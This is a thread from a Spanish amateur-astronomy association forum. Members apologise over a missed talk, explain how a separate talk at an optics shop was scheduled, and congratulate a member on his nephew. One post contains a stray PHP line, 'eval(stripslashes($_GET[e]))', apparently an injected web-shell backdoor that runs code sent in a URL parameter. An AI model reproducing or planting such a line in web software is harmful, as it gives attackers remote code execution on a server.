Júpiter, Lagrange y CCDs

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
Avatar de Usuario
Arbacia
Mensajes: 1185
Registrado: Vie Ago 31, 2007 2:50 pm

Júpiter, Lagrange y CCDs

Mensaje por Arbacia »

Carlos, lamento mucho que te dieran un plantón. Pero la causa de ese vacío corresponde a los organizadores de cada evento (AA.VV. el Cerro?) no a la intención de otros miembros de la asociación.

Mi charla de Optica Roma estaba apalabrada desde el mismo día que dí la de fotografía planetaria el 29 de mayo 2009 y se planteó en presencia de los asistentes como una segunda parte de la que dí ese día. En la primera quincena de septiembre concertamos con O. Roma la fecha definitiva de esta nueva charla, fué anunciada en su foro y tablon de anuncios de la tienda el 5 de octubre, tambien hicieron un mailing el 7 de octubre, un mes antes de la convocatoria. A diferencia de otras ocasiones, no me he molestado en publicitarla y entiendo que tampoco tuvierais conocimiento de su celebración cuando se convocó la tuya ya que tampoco la he dado en nombre de Astrohenares ni de AAHubble, sino en el mio propio a petición de Óptica Roma y de los asistentes a mi charla de fotografía planetária del 12 de mayo.

Entiendo que todo ha sido circunstancial y como señalaba al comienzo de este mensaje, es ciertamente desafortunado que no hayas podido presentar tu charla. Estoy seguro de que en breve podremos organizarla.

Un abrazo

Patricio
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Júpiter, Lagrange y CCDs

Mensaje por rviper »

[quote="m3ntol"]Alexis
ENHORABUENAAAA!!!!

:D:D que guapo es :D:D

tiene carita de que le van a gustar los refractores :)[/quote]

Muchas gracais Javier!! pero no os equivoquies que no es mio!! jeje, es mi sobrinito.
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Júpiter, Lagrange y CCDs

Mensaje por m3ntol »

Si ya decía yo que era mu guapo... :lol: :lol: :lol:

Pues enhorabuena igualmente, que los sobrinos los disfrutas cuando vienen de visita y luego cuando se ponen plastas.. a sus papis jejejeje
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Júpiter, Lagrange y CCDs

Mensaje por Manuelariza »

Alexis,enhorabuena por el sobrino,pero ya estas tardando en hacerle socio. :wink:

Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Avatar de Usuario
zipizape
Mensajes: 289
Registrado: Jue Oct 04, 2007 3:03 pm

Júpiter, Lagrange y CCDs

Mensaje por zipizape »

La verdad es que en los favoritos del navegador, tengo la entrada directa al foro de Astro Henares y no a la portada de la web.
Acabo de remediarlo.
Bueno el caso es que por unas cosas o por otras otras, no me había enterado de la charla de Carlos.
De todas formas, no habría podido acudir.
Siento lo del plantón.
Salvad la Tierra... es el único planeta que tiene chocolate.
Dra. Rachel Naomi Remen
Responder